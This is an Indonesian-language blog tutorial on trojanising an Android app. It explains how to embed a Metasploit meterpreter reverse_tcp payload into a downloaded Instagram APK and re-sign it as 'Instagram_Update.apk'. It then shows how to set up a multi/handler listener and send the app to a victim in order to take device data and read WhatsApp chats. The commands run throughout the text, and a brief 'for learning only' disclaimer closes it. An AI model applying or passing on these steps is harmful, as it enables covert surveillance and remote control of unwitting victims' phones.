Cara menyisipkan backdoor ke aplikasi lain (android) sangat wajib dipelajari agar kalian bisa mengelabuhi target atau sebuah sistem operasi. Proses nya juga sama seperti cara membuat backdoor yang kita bahas sebelumnya.
Hanya saja tutorial ini dapat berjalan dengan baik apabila dilakukan dengan Ubuntu atau kali Linux. Untuk menggunakan termux bisa (sudah saya coba), tetapi terkadanga saat proses sering terjadi eror.
Setelah berhasil menyisipkan backdoor, kita bisa dengan mudah mendapatkan semua informasi tentang perangkat korban. Bahkan kita juga bisa menyadap chat whatsapp korban.
Cara kerjanya, kalian hanya perlu mendownload file template backdoor dan aplikasi lain yang ingin disisipi contohnya facebook, instagram, dll.
Untuk file backdoor nya bisa kalian download disini. Dan file aplikasi nya kalian bisa download sendiri digoogle.
Selanjutnya tinggal memasukkan file backdoor ke aplikasi dan menghubungkan dengan metasploit.
Untuk langkah-langkahnya silahkan ikuti dibawah ini.
Tutorial menyisipkan backdoor ke aplikasi sosmed
1. Ekstrak file backdoor yang sudah didownload
Kalian bisa menggunakan tool pengekstrak zip. Contohnya ZArchiver atau ESexplore.
Selanjutnya pindahkan folder hasil ekstrak di luar folder apapun untuk mempermudah menemukannya saat dicari dari termux/ubuntu/kali.
2. Masukan aplikasi sosmed ke folder hasil ektrak
Sebagai contoh, ditutorial ini saya menggunakan aplikasi instagram. Tapi jangan dowload instagram di playstore, karena file apk nya tidak akan tersimpan didalam penyimpanan.
Tapi download dari web seperti apkpure atau apk miror. Selanjutnya pindahkan filenya ke dalam folder hasil ekstrak.
3. Masukan perintah untuk menyisipkan backdoor ke aplikasi
Pertama silahkan buka tool yang kalian gunakan, baik itu ubuntu, kali linux atau termux.
Apabila kalian menggunakan termux kemungkinan masih bisa dilakukan, Jadi ikuti saja langkah-langkahnya dengan baik.
Masukan perintah berikut untuk menyisipkan backdoor ke Instagram.apk
ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=1337
agar tidak gagal, instal dulu ruby dengan perintah pkg instal ruby / apt install ruby
# Instagram.apk adalah nama file aplikasi yang akan disisi backdoor
# lhost ganti dengan IP address kalian
# lport ikuti saja, jika error ubah ke 8080
Tunggu proses penyisipan selesai. Nanti akan muncul apk baru dengan nama Instagram_backdoored.apk
Jika disisi kalian gagal, coba ulangi dan pastikan koneksi internet stabil.
4. Berikan izin aplikasi yang sudah disisipi backdoor agar bisa diinstall di semua android
Caranya :
Masukan kembali perintah
java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk
# Instagram_Update.apk
Bisa kalian ganti dengan nama lain terserah kalian. Yang terpenting belakang nya harus .apk.
Setelah semuanya siap, kita tinggal menghubungkan aplikasi backdoor dengan metasploit.
5. Hubungkan backdoor dengan metasploit
Proses ini harus dilakukan menggunakan tool metasploit, jadi silakan jalankan dulu metasploit dengan perintah berikut.
msfconsole
Selanjutnya masukkan lagi perintah berikut untuk menghubungkan aplikasi backdoor dengan metasploit.
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 1337
exploit
# lhost dan lport
harus sama dengan yang kalian tulis saat proses menyisipkan backdoor.
Nah sampai disini kita sudah berhasil menyisipkan backdoor ke aplikasi instagram. Sangat mudah bukan?
Tapi lebih mudah lagi adalah proses menyisipkan backdoor ke gambar. Kita hanya perlu mengubah ektensi gambar ke .ico lalu memasukan playload.
Setelah backdoor sudah disisipkan ke aplikasi, kalian tinggal mengirimkan file aplikasi tersebut ke target dan pastikan target menginstal serta juga menjalankan nya.
Apa yang terjadi saat target menginstal aplikasi Instagram yang sudah disisipi backdoor?
Tidak akan terjadi apa-apa, target akan menginstal aplikasi Instagram seperti aplikasi biasa tanpa adanya perbedaan.
Hanya saja jika target membuka atau menjalankan aplikasi Instagram, backdoor yang ada didalamnya langsung bekerja.
Selanjutnya di metasploit akan menampilkan data seperti gambar berikut.
Nah, ditahap ini backdoor sudah terhubung dengan metasploit.
Selanjutnya kalian tinggal masukan saja perintah sesuai keinginan.
Untuk melihat daftar exploitasi kalian bisa cek dengan menu -help.
Oke sekarang kita sudah belajar cara menyisipkan backdoor ke aplikasi lain. Ditambah juga proses menghubungkan backdoor di target dengan metasploit, jadi makin lengkap.
Apabila ada yang masih bingung, silahkan simak video berikut untuk membantu pemahaman.
Ingat ini tutorial cara menyisipkan backdoor ke aplikasi ini hanyalah untuk pembelajaran saja. Apabila kalian menggunakannya untuk hal lain, saya tidak bertanggung jawab dengan resiko yang akan terjadi.
Terima kasih sudah membaca..